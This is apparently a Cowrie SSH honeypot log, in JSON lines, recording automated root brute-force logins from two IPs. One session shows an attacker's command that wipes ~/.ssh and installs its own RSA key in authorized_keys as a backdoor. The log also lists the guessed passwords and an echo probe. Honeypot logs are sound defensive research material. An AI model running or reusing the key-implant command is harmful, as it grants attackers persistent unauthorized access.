{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.372822Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.login.success","username":"root","password":"1310","message":"login attempt [root/1310] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.450502Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:47.518347Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.519170Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.543420Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.544602Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44910,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf3e43aeec12","protocol":"ssh","message":"New connection: 212.227.125.160:44910 (1.2.3.4:22) [session: cf3e43aeec12]","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.565148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.566147Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.591523Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.login.success","username":"root","password":"1307","message":"login attempt [root/1307] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.662850Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:47.723552Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.724262Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.750209Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.751316Z","src_ip":"212.227.125.160","session":"cf3e43aeec12"}
{"eventid":"cowrie.session.connect","src_ip":"206.172.46.162","src_port":55611,"dst_ip":"1.2.3.4","dst_port":22,"session":"e10decb4812c","protocol":"ssh","message":"New connection: 206.172.46.162:55611 (1.2.3.4:22) [session: e10decb4812c]","sensor":"my-vps","timestamp":"2025-08-28T11:48:51.204750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:48:51.205684Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:48:51.340814Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:51.922471Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:52.208531Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:48:52.209266Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:48:52.210171Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:52.345778Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:53.097324Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.098039Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.235647Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.236500Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.session.connect","src_ip":"206.172.46.162","src_port":55843,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2e0911271b8","protocol":"ssh","message":"New connection: 206.172.46.162:55843 (1.2.3.4:22) [session: c2e0911271b8]","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.369666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.370508Z","src_ip":"206.172.46.162","session":"c2e0911271b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:48:53.506377Z","src_ip":"206.172.46.162","session":"c2e0911271b8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:48:54.085606Z","src_ip":"206.172.46.162","session":"c2e0911271b8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:55.221794Z","src_ip":"206.172.46.162","session":"c2e0911271b8"}
{"eventid":"cowrie.session.connect","src_ip":"206.172.46.162","src_port":56085,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d63745fd86e","protocol":"ssh","message":"New connection: 206.172.46.162:56085 (1.2.3.4:22) [session: 5d63745fd86e]","sensor":"my-vps","timestamp":"2025-08-28T11:48:55.358433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:48:55.359126Z","src_ip":"206.172.46.162","session":"5d63745fd86e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:48:55.496411Z","src_ip":"206.172.46.162","session":"5d63745fd86e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:56.087239Z","src_ip":"206.172.46.162","session":"5d63745fd86e"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:56.225062Z","src_ip":"206.172.46.162","session":"e10decb4812c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:56.226236Z","src_ip":"206.172.46.162","session":"5d63745fd86e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59742,"dst_ip":"1.2.3.4","dst_port":22,"session":"47d860c796b7","protocol":"ssh","message":"New connection: 212.227.125.160:59742 (1.2.3.4:22) [session: 47d860c796b7]","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.773857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.774871Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.797446Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.login.success","username":"root","password":"1105","message":"login attempt [root/1105] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.871293Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:02.944944Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.945680Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.984708Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:02.986026Z","src_ip":"212.227.125.160","session":"47d860c796b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59752,"dst_ip":"1.2.3.4","dst_port":22,"session":"4382d4892695","protocol":"ssh","message":"New connection: 212.227.125.160:59752 (1.2.3.4:22) [session: 4382d4892695]","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.054559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.055754Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.084523Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.login.success","username":"root","password":"110185","message":"login attempt [root/110185] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.157984Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:49:04.227921Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.228716Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.252980Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:49:04.254056Z","src_ip":"212.227.125.160","session":"4382d4892695"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59766,"dst_ip":"1.2.3.4","dst_port":22,"session":"0660f42cac84","protocol":"ssh","message":"New connection: 212.227.125.160:59766 (1.2.3.4:22) [session: 0660f42cac84]","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.357499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.358439Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.381354Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
{"eventid":"cowrie.login.success","username":"root","password":"100882","message":"login attempt [root/100882] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:49:06.458735Z","src_ip":"212.227.125.160","session":"0660f42cac84"}
